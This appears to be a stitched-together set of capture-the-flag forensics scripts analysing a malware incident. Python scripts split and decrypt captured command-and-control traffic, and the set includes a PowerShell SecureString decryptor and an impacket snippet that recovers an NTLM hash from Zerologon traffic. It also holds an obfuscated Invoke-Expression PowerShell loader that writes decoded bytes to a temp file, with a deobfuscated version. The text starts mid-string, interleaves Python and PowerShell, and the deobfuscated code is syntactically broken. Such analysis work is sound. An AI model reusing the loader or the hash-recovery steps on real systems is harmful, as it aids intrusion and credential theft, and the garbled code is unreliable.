MAAyADUAOAA1ADcANAAxADMAMQA5AGMAYwA5ADAAOQAzAGIAOQA4ADIAMAA4ADIAYgBkADkAYwBmAGIAZgA4AGMAOABiADcANgBjAGYAZQBkAGEAZQBlADkAOAA0ADEAMgBlAGUAMABmADUAMQA0ADYAYQA4ADMAMQAyADMANwAzADQAOAAwAGQAZABlADQAZQAxADkANABmADUAZABlADUAYgAzADUAMQA2ADMAOAA4ADYAYQBjAGIANwBmAGMANwAwADgANABkAGQAYgA1ADYAOABkADgAOQAyADkAMgA0ADkANwA2ADgAMwBhADcAZABmADEAMwBlAGUAYwAyADEAZQBiADcAZQAxAGYAYwBlADcAYwBlADIAOAAyADUAOQBjADQANwBmADIAYwBjADkAYgA2ADcAYwAyAGMAMgA4ADUANwAyADkAYgA1ADEAMQAyADAANQA0ADIAYwA1ADAANwAxADcANAA4AGEAMgA5ADUAMQA1AGMAMwAyAGQAZQA1ADEAMgAyADEANQBiADkAZAA1AGYAYwA4ADMAMAA0ADkANQA3ADQAMAAyAGUAMABiADIANgBmADcAOABkAGUAMgAwAGYAOQAxADIAMgA0ADMAMgAyAGYAMQAxADcAZgAwADEAZAA0ADYANABhAGYAOAA0AGMANAAwAGMAMAA0ADQANQA2ADcAYwA4ADMAOQA1ADMAMABmADQAYQA2ADkAYwAxADkAMQBhADcAOQBjADAAMwBmAGYAOQAxAGEANQAxADYANwA1ADQAYQAxAGEAMwAzADgAYQA1ADcANgA5ADkAMAAxAGUAOQAxADEAZgBlAGYAZAAxAGIAZQAzADgAZAAxAGUAOABmADQAZQA4AGIAZAA1AGIAOQA4ADYAMgBiAGEAOABiAGYAYwAyADEANQAzAGUAYQA1ADMAYgBmADkANQBhADMAYQA1ADQANgA4ADMANQBkADcANAA2ADAAZgAwADUAYwBkADUAOQA4AGIAZAA2ADkANAAxAGEAYgBlAGMAOQBmAGEAZgA2AGYAMgA1ADkAZQA3AGYAYgBiAGMAOQA3ADYAMwAyAGMANwAzAGYAZAA5ADgANwBkADMANgAwADkANwA1AGYAZAA3ADkAMgAwADUAYgA1AGYANAA0AGQAZgAxADIAYgAyADMAMQBkADEANAAyADQAZQA4ADQAMwA0AGEAZgAwADcAMgBiADAAZQBkAGQANgAyAGUAZgAwAGUAZABjAGIAZgA4AGIAMAA5ADEAMQAxAGQAYwBlADMANwA5ADgAZAA2ADIAMgA0ADEAZQA2AGMAYgBmADQANgBlADkAYwBmADkANABjADcAOAA5AGIAYwBjADYANwBlADYAYwA3AGQANwA3AGIAZAAxADgAOQBiAGQANgA0ADMANgA5AGMAMgA3ADgAYQA0ADgAYgBjADcAMwA2AGEAYQBhADUAYQA0AGMANABmADQAMwBkADUAZQA3AGMAMQBkADEAMgAxAGEAMAA1AGUANQBlADIAYwA1ADkAOAAyADIANgA1AGYAMwBjADcAZQAyAGEAYgA0ADYAYQBhADMANgBhADgAMQAwADUAZgBhAGMAMgBiADkAOABmADEAYQA2ADgAYgA2AGEAOQBkADIAYwAyADMAZAAzADkAOQA4AGQANwAxAGUAZgA0ADcANwBkAGMAOQA0ADUAZQA3ADAAYgAyAGEAMwAzAGUAOQBjADcAZQA2ADIAZgA4ADkAOQAwAGIAZABkAGMAMwA5AGMAMQBhADkAMwAwAGYAMwBjAGQAMgA3ADcAYQA0ADMAOAAzAGQAYwA2ADEAOAA0ADUANABmAGQAMwBkADYAZQAxAGQANQAwADgANQA3ADkAZgBiADgAOAAyADkAYgBlAGMAYwBiADQAMQAyADEANgBmADcAZAAzADUANgA4AGMAZgA4ADAANwA5AGYAOQBkADMANABkADYANQAwADAAMgBjADcAYwA3AGYAZQA5ADMAMQBkADUAZABhADQANAA3ADgAYwBkADQANgA4ADUAZQA1ADAAMAAwADcANwBhADcAYQA5AGMANgA5ADcAYQA5ADAANQA5ADQAOQA2AGQAZQBlADUAYgA5ADUAMwAxAGEAMwAyADkAZQBjADkAZAAwADcAZQBmADAAMgBhADYANQBmADkANAAzAGQAZAA0ADMANQAwADUAMgBjADUAMABjAGMANgAxADUAMwBhADkAYwA3ADEAMQBjADMAOQA0ADEAZQA1AGEAZQA4AA=='
# Write-Host "Encrypted:`n$encrypted`n"

# create new object using $encrypted and $aeskey
$secureObject = ConvertTo-SecureString -String $encrypted -Key $aesKey

# perform decryption from secure object
$decrypted = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($secureObject)
$decrypted = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($decrypted)
$decrypted

## decrypt_rice_serpent.py
import os

for i in range(1, 33):
    name = "_" + str(i)
    data = open(name, "rb").read()

    if i == 3 or i == 14 or i == 30 or i == 31:
        out = name + '.b'
        open(out, "wb").write(data)
        os.system("serpent.exe " + out + " " + out + 'i')
        os.system("alg.exe " + out  + "i " + out + 'in')
    else:
        out = name + '.b'
        open(out, "wb").write(data[4:])
        os.system("alg.exe " + out + " " + out + 'in')

## decryptData.py
from Crypto.Cipher import AES, ARC4
import os

for i in range(1, 33):
    name = "send_" + str(i)
    data = open(name, "rb").read()
    key = data[9:0x19]

    if ord(data[8]) == 0:
        out = "_" + str(i)
        enc = data[0x1d:]
        open(out, "wb").write(''.join(chr(ord(enc[i]) ^ ord(key[i%16])) for i in range(len(enc))))

    if ord(data[8]) == 1:
        rc4 = ARC4.new(key)
        out = "_" + str(i)
        open(out, "wb").write(rc4.decrypt(data[0x1d:]))

    if ord(data[8]) == 2:
        aes = AES.new(key, AES.MODE_ECB)
        out = "_" + str(i)
        open(out, "wb").write(aes.decrypt(data[0x1d:]))

    if ord(data[8]) == 4:
        out = "_" + str(i)
        open(out, "wb").write(data)

# call hook keylogger --> (1->i) (4->a) (0->o)

## export_data_module.py
client_recv = open("10_100.bin", "rb").read()
client_send = open("100_10.bin", "rb").read()

recv = client_recv.split(b"CSCN")
send = client_send.split(b"CSCN")

# print (recv)
print (len(recv))
print (len(send))

for i in range(len(send)):
    name = "module/recv_" + str(i)
    open(name, "wb").write(b'CSCN' + recv[i])

    name = "module/send_" + str(i)
    open(name, "wb").write(b'CSCN' + send[i])

## psdecode_.ps1
INvoKe-EXPrEssion ((("{54}{55}{3}{82}{7}{81}{74}{62}{65}{86}{12}{26}{67}{19}{11}{24}{52}{76}{25}{32}{35}{36}{69}{9}{22}{51}{43}{66}{45}{61}{18}{80}{50}{14}{75}{77}{29}{13}{68}{16}{2}{31}{15}{72}{85}{17}{73}{70}{59}{88}{89}{39}{53}{34}{5}{78}{41}{63}{38}{21}{33}{4}{46}{27}{48}{71}{10}{79}{37}{28}{64}{42}{20}{60}{49}{47}{6}{23}{57}{1}{84}{87}{83}{58}{40}{0}{56}{30}{8}{44}"-f '.IO.File]::Write','id();
','r (','t_','t_.Length];
}

tyPt','] -bx','[System.G','= tyPenv:C','s(tyPtmp,[B','3','Pat','49, 6','
ty','2','9, 28, 1','k.Lengt','
fo','	t',', 72, ',', ','strin','% tyPh','9,','uid]::Ne','6,',' 95','Pk =','= [','th();',' ','Byte','tyPi=0; tyPi -lt tyP',', 95,','os','k[tyPi',' 3','0, 43, 48, ','::GetTempPa','i ','t','
[System',' tyPh','
[','4','yte[]]tyPk);
',', ','mp ','Pname = ','Syste','y','2',' ',' 40, 44, 74','yP','t','yPhos','All','wGu','name;
','t','g] t','74','NA','ost_[tyP','
','M','9, 76',' 27, 39','8;

','114, ','Pk[','m.IO.','h','y','MPUTER','14,',',',' 27,','or','h]','30, ','O',' ','mp += tyP','
t','; tyPi++) {
','E;
','yPt','yPi]',' = ')).ReplACE('tyP',[sTRiNg][CHAR]36))
	from impacket.dcerpc.v5 import nrpc, epm
	from impacket.dcerpc.v5.dtypes import NULL
	from impacket.dcerpc.v5 import transport
	from impacket import crypto
	from impacket.dcerpc.v5.ndr import NDRCALL
	import impacket

	from binascii import hexlify, unhexlify
	from Cryptodome.Cipher import DES, AES, ARC4
	from binascii import hexlify, unhexlify


	serverChallenge = b'fe216509397c0893'
	sessionKey = nrpc.ComputeSessionKeyAES(None,b'\x00'*8, unhexlify(serverChallenge), unhexlify("31d6cfe0d16ae931b73c59d7e0c089c0"))
	print("session key: ", hexlify(sessionKey).decode())

	enc = b'97357430f9fee6fb3b32bdea7a3b206d'
	pwdata = impacket.crypto.SamDecryptNTLMHash(unhexlify(enc), sessionKey)
	print ("pwdata: " + hexlify(pwdata).decode())
	# 24631463edc7d6a03657f1ea0f3cff7b
	$k = 27, 39, 49, 66, 40, 44, 74, 95, 95, 30, 43, 48, 114, 39, 49, 76, 74, 72, 30, 29, 28, 114, 27, 28;


	for $i=0; $i -lt $k.Length; $i++ {
	$k[$i] = $k[$i] -bxor $host_[$i % $host_.Length];
	}

	$tmp = [System.IO.Path]::GetTempPath;

	[string] $name = [System.Guid]::NewGuid;

	$tmp += $name;

	[System.IO.File]::WriteAllBytes$tmp,[Byte[]]$k;
	# Zerologon_is_crazy______
	# create aes key - keep this secure at all times
	$aesKey = (8,3,173,146,182,87,181,9,67,38,106,106,249,114,100,219,253,11,39,98,162,97,239,119,35,89,106,111,140,75,22,156)
	$encrypted = '76492d1116743f0423413b16050a5345MgB8AG0AZwBMAHQASQAzADAAQgBOAGEAQwBMADcAVABRAFgAZABFAFUAWgBqAFEAPQA9AHwAYgAwAGYAYwA4AGEAMABlADUAMgA2ADQAMAA5ADAAYQBlAGMAYgAyAGIAOAA3AGMAOABlAGMAMgAxADkAOQBhADIAZAA0AGIAZAA5AGEANwA2AGUAMwA3ADkAZAA0ADUAMgAzADQAZAAwAGQAYQBiADYAOABmAGEAYQAxADgAZABmAGEAMgA2ADQAYwBkADAAYwA1ADIANQA1ADQAZgAwADIAOQAwAGMAZQAyADMANwBiADgAMQA5ADEAOQA3AGUANgA1ADkAMgBmAGEAMwBmAGMAMQBmADkAMwAzADQAZgBiADkAMgBiADYANwA5ADUAOQA0ADQAZQBkADMAYwA3ADQANAAwADAAZgA4AGIANgAwADIAYQBkADEAMgA3ADIAYwBiAGIAZAAwADUANwA1ADgANgBiADgAMgAyADIAMAAwAGYAMQA2AGQAOAAxADAANQAzAGUANgA1ADMANQBjADYAOQA4ADEAMwAyADgAOAA0ADkAMAA0AGEAYQAwAGMAMgBlADYAMQBkADAAMgBkADUANgBmAGIAYwBjAGQANQAxADYAOABlADkAYgA2ADEAYgBjAGQAMQA0ADQAMgA4ADAANQBlADkAMwA5AGUAOQAzADAAYQA3AGYAZAAwAGEANQBmADcANABhAGEAYgA2AGYAYwA4ADEAZABjAGEAMwBmAGMANwBkAGQAMwAzADYAZQBiADIAZQBlADUAOQAzAGIAYwA3ADAANQBiADEAZABiADUAZQAyAGIAZQBmADAAMQA3AGEAZQBhADAAYwA0AGIAZABjAGUAOQBlADcANQBiADgAZgBhAGQANABmADAANwBiAGYANABiAGQAZgAyADMAYQAxADEAYgA1ADgAZgAzADcAOAAxAGUAYgAzAGUAMgAwAGYANgA1ADIAMgAyAGUAZgBkADAAZAA2ADUAMABhADgAZgBjAGIANQA2AGMAMgA1ADcAMQBjADkAYwBiADkANABiADkANQA1ADIAZAAxADIAZAA5ADEAMwBlADIAYwAyADkANwAwAGUANAA0ADAAOAAwADMANQBlAGUANAAxADUAZABmADUAZgBhADMANAA4ADkAZgBjADQAMwA0ADAAOQA2ADAANgAxADIAZQBlAGMAOQA2ADIAOQA0ADgANQA0ADMANwA1ADAAYwA1ADYAOQBmADEAZABiAGYAMQA4AGUANAA4AGMAMQA5ADAAZAA2ADUAYgAyADgANgA3AGYAYgBjADcAZgAyADMAYwA2AGUAYwA3AGUAZQBmADgAMwAzAGMAMgA2ADkAZQAxAGEAMAA1ADkAMgBkADEANgAyAGIAMAA4AGIAOAA5ADIAMQBiAGEANABiADEAOABjAGQAZgBmAGYAYQAwAGYAMwBmAGMAMQAwADUAZgBiAGYANABlADQAZgBmADcAOABjAGUANwA2AGEAMwA1ADAAZgAwAGQAYgA1ADQAMQA4AGYAYQA3AGEAZQA0ADYAYgAyAGUAZQA0ADgANAA0ADkAMQA5ADkANAAyAGQAYQBhADAAZAA4ADYAZQA5AGMAMgA0AGYAZgA4AGEANwAwADgANQA2AGUAOQBkADEAZgA2ADQANgAzAGQAZgAwADUAYwA3ADIAMABjADcAYwBlADMAOQAyADIAZQBhAGQAYQBlAGQAMgA0AGIAMgBlAGQAOQBiADUAMAA4AGYANQA4ADAAZQA5ADUAMgBmAGEAMgAyADkAMwA2AGIAMQAyADYANwA3ADUAOABmAGEAZQA1ADkANQA2ADIAOAAxADgAMQA4ADYAMgAyADQAOAAxAGUAZAAwADMAYgA4ADkAZQA5ADgAMgA1AGYAMgBmAGIANwAyAGYAZgAyAGEANwA5AGMAMwA5AGYAZAAyADUAMwA1ADAAZgAwAGEAYgBlADkAMABlAGIAOAA0AGQAZAA5ADMAMgA0ADEAMQA1AGUAMAA0ADEAMgAyADgAYQA0ADMAZAA3ADAAYwA1AGUAOQBmADQAYQBhADMANQBhADYAOAAxADAAZQA1ADkAOABmADMAMABkAGEAYQBlADAANQAyADUAYQA0AGYAOABkAGMAYwBhAGIAMABjADEAYgAzADkANAAzADMAYwA3AGQAZQA4AGUAYgA5ADEAMABkADIAOQBiADEAYQA1ADkAZAA1AGUAMwA3AGUAOQAyAGUAMQBmADEAOQBkAGUAMAA2AGEAZQAxADkAYQA4ADgANAAzADcANQAyADUAOQA2AGIAOQAxADYANwA3ADQAMQBlAGQAOAA4ADAAOQA0ADUAYgBmADUAOQA2ADgAYwBhAGUAOQAzADMANwA1ADkAZgAyADQAZAA1AGYAZABmAGIAZQBlAGMAMQAxADcAYQA4ADYAMwBjAGEANgA3ADEAMgA3ADYAZgA4AGMAMQBhAGEAZAA2AGEAYQBjADAAMgAwADAAYQA4ADUAOAA3AGQAMwA0ADQAOABmAGEAZgBkADMANABhADYAMQBiADIAMwA1AGUAOAA5ADQANgBlADAANQA2AGIAZABmADQAMQAwADgAMgBiADUAMgBhADUAYQBlADEAYwAzADIAMwA0AGUAOQA5ADMAZQAwADAANwA5ADkAZAA3AGUANwAyADQAOQAzAGQAMwA3ADMANwA3AGYAYwBiAGIANAA4ADcAOQA1AGIANQAxAGMAYwA0ADEAYQBkAGYANQAxAGEANAA2AGEAYwA2AGQAMABhAGIANwBhAGIAZQA1ADYAMQBkAGQAMgBlADMAZgA1AGEAMgBkAGEANgBmAGYAYwA0AGMAMgA4ADQAOQA3ADgAZgA0ADcANAA4ADIAMwA1ADcAZQAzAGEAOQA1ADYAZgAxADIANQA0ADMAMAA2AGIAMQA0AGYANgAwAGYANABkADMANwBhADUANgA3AGEAMAAyADkANAA4ADEAZQA0AGYAOAA4ADEANgAyADEAZABiADgAOABlAGQANAA2AGEAYwBlADMAOAA1ADUANgAzAGEAMwA5AGEAMAA5ADMAZAA2ADAANwBjAGMAZQA3AGIAOAAxADUAYQAwAGYAOAA0ADEAZQBjADMAOQAwAGIANQA5AGMAYwAxADQAMwBlADQAZABlADkAZAAwAGEAMgA3ADkANgBiADQAYgBjADAAYgBlADEAMwBjADIAOABiAGYAMQA4ADIANABiADMAZQBkAGIAMABkAGQAZABiAGQANgAwAGQAOAA0ADEANwBhADgAMgA2AGIAZABhADYAOQAwADQANwAzADUAZgA4ADEAMQBlAGYANgAxADEAZQA2AGMAMAA3ADUAZgA5ADQANABmAGMANQAzAGYAMAA2ADEAZQBiAGYANwA1ADkAZAAxAGUAYwA2ADkANABkAGEAMgBhAGUANwAwADcANAAzADAAOQBmAGIAYgBkADUAZABkADEANgA1ADEAOQA0AGQAYgA4ADgAMwBmADQAOQBiADgAMgBiAGEANABhADMAOQBkAGYAMgBkADQANAAxADkAYQA5AGEAMgAzADcANwA0ADQAZAAwAGUANABlADYAYgBlADMANABhAGIAZQA4ADMAOQA4ADMAYgA4ADkANQAyAGUAMABjADkAOAAwADMAYgAwADEAYgA1ADYANwBjADcAZABiADQAOAAxADgAOAA4AGMAYQA3AGMAOQA1AGUANAA4ADEANgBiADcAOQBkADMAMgA3ADIANAA2ADUAZQAzADcAZgBkADAAZQA3AGUANgBmADMANQAyADEAZABiAGMANwA5ADIAZABlAGYANQAyADIAYwA3ADQAYgA4ADUAMAAzAGUANABlADAAOQAyADIAZAAwADUAZQBmADcAZABhADIAZgA4ADAANgBhADgANgAwADYANwBhADUAMQBkADQAZQAzAGIAYgAxADYANgA3ADQAYQAwADAAMQBhADMANgBkAGIAYgA1AGMAMABhAGIAYgAwADcAZgBiADIAZQBmADgANAA5ADEAZAAwADAAYQA5AGUAMQA0ADEANwBmADUAMABkADAANwAxADIAOQAxADYAYwBjAGYAZgAxADcAYwA3AGMAMABjAGEANgBjADUAOAA0ADYAOQBkAGMAYQBmADQAZABlADYAMQBkADIAOQA1AGQANwAyAGYAYwBkADYAZgAwADMAZgBhADIANQBlAGEANQBiADYANAAxADgANQAyADIANAA0ADQAYwAxADMANQAyADkAOQAzADcAZQAzADcANgAwADQAYQA0AGEAYwA0ADIAOABhAGQAOQBiADUAYQBhADgAOAAxADYAYQBiAGMANwA4ADMANwBkAGQAMABkAGQAYwA5ADAAOQAyAGQAZQA5AGUAZQBiAGIAMgAxADIAZABkAGEANwA4ADQAZQBlADQAZAA5ADUAZAA3AGQAYgA3ADUANgBjADgANAA2ADgAZgA1ADQAMgA1ADkAMQA0ADEAYgBjADAAZAAzADAANwAzAGIAYwBhADAANgAyADcAMAA3ADUANQA3ADQAYQAzADEANQAwADIAMgAwADAAOAAzAGMAOAA1AGEAMAAzADEANQAzADMANAA4ADMAMgA4AGYAOQAzADQAOAA5ADYANgBjADIAMQAwAGQAOAA1AGIANgAzAGEAZAA0ADYAMQA3AGMAZQA3ADkAZABmADUANwA0ADIAYwBmADgANgA4AGIAMAA1AGEAMgA3ADcANQBiADEAYQA1ADAANABmADkAZgA1ADcANQA3AGUANgA1ADkAMQAzAGIANABmADYAOQAwADIAZAA3AGQANgA0AGMAZQBjAGIAOQA0ADYAZgBlAGQAOQAwADYAZAA0AGQAOQBmADMANAAyADMAOQBlAGUAMQAwADEAYgBjADMAOABiAGYAYgBjAGIAMABjADEAZQAyADMAYgBjADUAZAA1ADYAMAA5ADcANAAzADIAYgBkAGYAYQA0AGEANgBkADcANgAyAGUAMwA1AGYANgAwADgAYQBiADYAMgBmADgANwBmADMAOABkAGEANABkADAAYgBhADYAYgBjAGEAOAA3ADkAMAA4ADQAOAAwAGQANQA2ADUAZgAyADMAMQBkAGUAMQAwADMAZABkAGYAOABiAGEAYgAxADgAOQA0ADcAMwAwADgAOQA3AGYAMgAzADAAMABlADUAZQAwADYAOAAwAGIAYwA1AGUAZQBjAGUAYgAwADUANQBmADgAMAA2AGYANQBhADIAYQBmADcAYQAxADgAZgAxADEAZQA2AGEANwBjADUANQBmADAAYgBlADAAZgBiADcAOQA2ADgAYwA3ADIAZgA5ADYANwA3AGEAMwBkADUAMgBlAGQAYgA0AGIAZQA4AGUAMwA5ADIAYQA1ADAAYwA5ADQANwAxAGMANwA2ADMANABjADEAZAA4ADUAMAA4AGYAYgA2AGMANQAwADEANQBiADkAYwAyADgAYwBiADYAMQBiADgAYgA3ADkAOQA0ADIAYQBlADEAMQBlADYANwA1ADEAOAA4ADUAYgAxAGUAYwBiAGEANwBlADYAZQAxAGEAZgBiADUANgA3AGEAYQA1ADQANAA1ADgANABlADQANAA5ADYAMgBlADQAZAA5ADgAOAAyADcANAAxAGMAZABiADEAZAA1ADgAZgBkAGEAMgBlADkAZQBhAGMANQA4ADAAYgA0AGMANAAyADgAMgAyAGEAZQA3ADgAOQBlADEANwBlADEAMgBhADEAYQA3AGYAZQBhAGUANwBmADkAZgA1ADUAZAAxADQAZQAwAGIANQA3AGYAZgA5ADEAZQA5AGQANQAzAGIAZQBiADAAOQBiADYANABmADAAOQBkADIANABkAGQANwAzADIAZQBlADEAOQBiADUAZQA0AGQAMABkAGIAYQBiADgAOQBkADkAMQA1ADgAOQAwADQAYgA3ADQAYQA0AGYAMwA1ADEAMAA1AGMAZgAxADIANgBjADYAMwAzAGIANQAzAGYANwA2AGQAYwA5AGQANgBkADkAOQBkADgAMgBmADMAOQA5ADQAZgBiADEANAA5ADYAMwBkADkAYgBjAGEAMQA3AGEAYgAwAGYAMAAxADAANwBiADkAMQAzADYAMgBjADQAMgBmAGUANAAwADEAYwA4ADgAMQA5AGQAMABhAGQANQBiAGUAMwA2ADYAOQA3ADYANABhAGQAYgAwAGEAZgA5ADUAYQAxADUAZAA5ADYAZQAwADgANwA2ADkAYgBmADAANwA5ADYAOQAxADQAZgA0AGQANQBkAGIAZAAxADMAYQA3ADUAMAAxADAANwAzADAANgBlADMAMgAxADMAMQBmAGYAOAA2ADQAOAAwAGMAMQBmADgANgAxADgANQBhADYAOQBjADIANABhAGUAMABkAGUANgAyADMAZABlAGEANgBiAGYAMABlAGEAMAAxADUANQA4AGYANABjADYAZABjAGIAMgA5ADcAZAA0AGUAMQA5ADMAMgA3ADUAZgAyAGEAZAAxADkANAAyAGIAZABkAGMAZQA4ADcANQA5ADcAMwBhADAAZAA2AGIAMQAyAGEAZAA4ADAAYwAxAGMAMgA2AGIAZgA4ADEANQA0ADgAOQBkAGYAZAA2ADQAOABiAGQAYQAwAGYAZgA5AGIAMgAwADQAYQAyAGYAZAA5ADgAOQA1AGQAMgAxADEAYgBiAGMAMgAyADcANABjADQAMgA1AGUAYQBjAGYAZgAyADAAMwAxAGQAOABjAGQAYQAwADYANQA5AGUAMgA4ADYAOQBhADUAZAA1AGUAOQA2ADIAZQAzADgAMgAwADAAOQBkADkAZAAwADcAZgA0AGMAYgA5ADQANwA5AGUAYwBhADUANgBlADMAZgA5ADQAZAAzADgAZgA4AGMAMwA4AGMAOQA0ADYAZAA1ADgAMQBiADgAZQBiADAAYwBhAGEAZAA0ADAAMgA2ADQAMwBiAGUANwAxADUAYwA1ADMAZABhAGQANgA2ADIAYgBkAGIAYwBkAGYAYQBjADcAOQBjADUAMgA3AGMAMwA1ADAANAA3ADQAYgA0ADMAZAA1AGQAZQAzADEANQA2ADcANwA1AGEAZABhADYANgBkADAAMwA3ADcAZgBlAGEAZABlADkANAA4ADQAYwAwADkAMAAyADMANgBmAGUAYwBlAGIAYQAwADkAYQBjAGUAMgBlADcAZgBkAGIAMgBmADUAMgBmADUAYQA1ADcAMQAzADIAMwBmAGYAYwBkADEAMwAxAGYAMwA1ADIANABkADgANAA3AGEAYwBkADMAMQAxAGYANgA3ADUANgBlAGEANgAyADAAZQBhADcAYwBkADUANgBlAGUAMQA3ADcAMABmADUAMgBjADQAYQBkADMAMwBlADIANABkAGQANAAyADAAMwA2ADkAMAA4ADUAMwAyADcAMQAwADIAMQAzAGMAZAA4AGUAYQBiADMAMQAzADQAMwA1AGEANAA4AGYAZQBlADIAOAAyADMAZgAwADEANgBkADAAYQA4AGYAMgBiADgANgBmAGQANAAzADMANQA0ADcAZgBkADkAOAAxADQANgA4AGMANwA1ADAAOQBiADMAYQAxADMANQAxAGEAOABjAGYAYgA4ADEAMAA3AGYANQAzADkANwBmADcAMwA5AGYAMgA2AGQANABlADgAZgA3AGUAMABiADYAYQBkADAAYwBjADcANAAyADEANgAyADMAYwAxADIANQA2AGQAMgA2AGYANwA0ADUAZgA4ADYAZAAwADQAMAAxADAAYgA1ADEAMAAwAGYAOQBhADAAMQBkADkAZABiADYANABjADEAOQBiAGYAYgBlADUANwBmAGMANQA3AGUAZgBiAGEANgA5AGEAMwBhADQANgA5ADAANgAyADUAMAAyAGUAZgA3ADQANwA2ADcAMAAyADUANgA2ADUANAA4ADgAYgBiADkANAA0AGYAZQBlADgANQBhADAAYgBhAGIAYQA4ADAAMwAxADQAYgBkADkAZABkAGUAMQAzADUAMQBkAGUANgBhAGEAZQBlAGUAYgBlADcAYQAyAGMAYQA3ADAANgA3AGMAMQA3ADgAYwA0ADQAMQAzAGEAZABhADIAZAA5AGEAYQBiADcAZgAyAGMANQAwAGUAZQBlADkAMQBmAGUAYwAyADEANQAwADkANAA1ADgAOABmADcAMQA0ADQAYwA5ADkAZABmAGYANAA5ADQAYwA5ADcAYgAxAGYAOQA3AGIAMwBhAGYANwA5ADMAMgAxADIAYQBjADYAMQAxAGMANAAyADYANwA3ADkAMQBiAGUAYQA3AGIAMQAxAGUAMAAyAGQAMgAwADUAZABkADIAYQBhADgANgBmADEAOAA1AGIAOQA0AGMAYwBlADYAMABmADAAZQAzADMAMQAyADYANwAzADYAYwBmAGQAYwBmAGQANwBjAGYAZQBmADYANwA3AGEAZgA4ADgANgA3ADcANQBiADQANQA4ADEAMwA5ADAAOQA0ADMAZQAxADUAZAA4AGYAYgA0ADYANgAwAGIAMAAxADIAZQBlADIAMQA3ADkANQA2ADUAZgBmAGUANwAxADcAYwBmADcAOAA3ADcANwBiAGYAMQBjADUAMAA2ADUANAA2ADcAOAA0ADkANwAzADgAYQBmAGUAZAAyADgAYwAwAGQAOAAzADMAMQA2AGUAMwA4AGQAMgBiADYAYwAwADgAOQA0ADYAZgBjADcAMwBjADUAMgA2AGQAOQAwADIAZQAxAGQAMABiADgAMgBjADMANwA1ADUAYwAyADYAMgBmADMAMwA4AGEAOQAwADAAMwA5ADAAMwAyADkAMAA1ADAANQBiADgAYwBjADYAMABjAGIAMQAwAGIAOABiAGMAMAAzADEAYQBjADIAMQA1AGUAMAA0ADQAYQAxADAAMAA5ADMAYgBlAGQAMwBiAGQAMABjADEAZABmADMAMAA2ADMAOAA3AGEAZQA5ADMANwBkAGEAYQA2AGQAMAAzADIAOABjADMANwAzADgAZABlADUAYQAxADMAZgBkAGIAOAA3ADYANAA3ADYAZABkAGUANQA1ADgAYwBjADEAMAA0AGEANgA0ADMAYgBhADgANgAzADUAZAA4ADMANgA3ADIAZABjAGIAZQAzAGYAMgBkADkAMgBjADgANABkADYANwA5AGUANgA1AGQAMwA5ADcAOAAzAGUAOQBmAGUAYwBiAGUAZAA2AGEAMwAwADcAMAA5AGMAYgAxADMAYgA0ADQANwAzADYANQAwAGIANwA2ADIAMwAxADIANgBlADEAZABkADUAZQBjADMAMgBmADIANAA5ADgANwBhADAANAAyADcAOABhAGUAZQBiADgANwBiADkANwA5AGUAZQA0AGEANQA0ADAAOQAxADYAZgAyADYANQBjADAAMQA1AGEANABiAGYAYQAyAGIAMwA5ADEAZQBmAGQANQA5AGYAYQA2AGEAYwAxADMAOQBhADgANwAwAGYAMgAxADcAMgAwADAAOAA3ADMAMwA4ADAANgA1AGQAYQBlADUANgA3AGEANgA0ADAANgA2ADIAZgAwAGUAMAAyADUAOAA1ADcANAAxADMAMQA5AGMAYwA5ADAAOQAzAGIAOQA4ADIAMAA4ADIAYgBkADkAYwBmAGIAZgA4AGMAOABiADcANgBjAGYAZQBkAGEAZQBlADkAOAA0ADEAMgBlAGUAMABmADUAMQA0ADYAYQA4ADMAMQAyADMANwAzADQAOAAwAGQAZABlADQAZQAxADkANABmADUAZABlADUAYgAzADUAMQA2ADMAOAA4ADYAYQBjAGIANwBmAGMANwAwADgANABkAGQAYgA1ADYAOABkADgAOQAyADkAMgA0ADkANwA2ADgAMwBhADcAZABmADEAMwBlAGUAYwAyADEAZQBiADcAZQAxAGYAYwBlADcAYwBlADIAOAAyADUAOQBjADQANwBmADIAYwBjADkAYgA2ADcAYwAyAGMAMgA4ADUANwAyADkAYgA1ADEAMQAyADAANQA0ADIAYwA1ADAANwAxADcANAA4AGEAMgA5ADUAMQA1AGMAMwAyAGQAZQA1ADEAMgAyADEANQBiADkAZAA1AGYAYwA4ADMAMAA0ADkANQA3ADQAMAAyAGUAMABiADIANgBmADcAOABkAGUAMgAwAGYAOQAxADIAMgA0ADMAMgAyAGYAMQAxADcAZgAwADEAZAA0ADYANABhAGYAOAA0AGMANAAwAGMAMAA0ADQANQA2ADcAYwA4ADMAOQA1ADMAMABmADQAYQA2ADkAYwAxADkAMQBhADcAOQBjADAAMwBmAGYAOQAxAGEANQAxADYANwA1ADQAYQAxAGEAMwAzADgAYQA1ADcANgA5ADkAMAAxAGUAOQAxADEAZgBlAGYAZAAxAGIAZQAzADgAZAAxAGUAOABmADQAZQA4AGIAZAA1AGIAOQA4ADYAMgBiAGEAOABiAGYAYwAyADEANQAzAGUAYQA1ADMAYgBmADkANQBhADMAYQA1ADQANgA4ADMANQBkADcANAA2ADAAZgAwADUAYwBkADUAOQA4AGIAZAA2ADkANAAxAGEAYgBlAGMAOQBmAGEAZgA2AGYAMgA1ADkAZQA3AGYAYgBiAGMAOQA3ADYAMwAyAGMANwAzAGYAZAA5ADgANwBkADMANgAwADkANwA1AGYAZAA3ADkAMgAwADUAYgA1AGYANAA0AGQAZgAxADIAYgAyADMAMQBkADEANAAyADQAZQA4ADQAMwA0AGEAZgAwADcAMgBiADAAZQBkAGQANgAyAGUAZgAwAGUAZABjAGIAZgA4AGIAMAA5ADEAMQAxAGQAYwBlADMANwA5ADgAZAA2ADIAMgA0ADEAZQA2AGMAYgBmADQANgBlADkAYwBmADkANABjADcAOAA5AGIAYwBjADYANwBlADYAYwA3AGQANwA3AGIAZAAxADgAOQBiAGQANgA0ADMANgA5AGMAMgA3ADgAYQA0ADgAYgBjADcAMwA2AGEAYQBhADUAYQA0AGMANABmADQAMwBkADUAZQA3AGMAMQBkADEAMgAxAGEAMAA1AGUANQBlADIAYwA1ADkAOAAyADIANgA1AGYAMwBjADcAZQAyAGEAYgA0ADYAYQBhADMANgBhADgAMQAwADUAZgBhAGMAMgBiADkAOABmADEAYQA2ADgAYgA2AGEAOQBkADIAYwAyADMAZAAzADkAOQA4AGQANwAxAGUAZgA0ADcANwBkAGMAOQA0ADUAZQA3ADAAYgAyAGEAMwAzAGUAOQBjADcAZQA2ADIAZgA4ADkAOQAwAGIAZABkAGMAMwA5AGMAMQBhADkAMwAwAGYAMwBjAGQAMgA3ADcAYQA0ADMAOAAzAGQAYwA2AD